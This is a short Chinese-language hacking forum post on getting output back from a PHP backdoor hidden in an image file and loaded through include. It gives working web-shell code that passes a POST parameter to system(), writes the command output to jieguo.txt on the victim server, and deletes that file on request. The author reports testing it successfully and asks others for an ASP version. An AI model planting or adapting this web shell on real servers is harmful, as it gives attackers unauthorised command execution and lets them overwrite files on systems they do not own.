首先让我们想一想为什么图片后门是没有回显的原因:大家知道,我们用include包含图片之后,解释器就会把图片当作文本文档进行寻找并自动解析<% %>或中的脚本.所以其他什么html格式的字符如
我们换一个想法:反正既然能够肯定可以执行脚本,那我们就把后门运行的结果通过脚本写到服务器的文件中,然后再访问.不就可以看到回显了吗?
这种想法要有个条件: 至少有一个文件夹可写.
先看看我插入图片的脚本,是一个cmd.php.可以把运行结果放在服务器当前目录下jieguo.txt文件中,注意对方最好没有同名文件,这可是会覆盖文件的```(由于我不会asp,所以这次还是用php
举例)
这是脚本的内容:
CODE
if ($_POST['cmd']){
if ($_POST['cmd']=="del"){
@unlink("./jieguo.txt");
}else{
if (is_writeable ("./")){
@system($_POST['cmd']." > jieguo.txt");
exit;
}
}
}
?>
经测试成功,谁有空的话,把脚本改为asp的,我先谢了,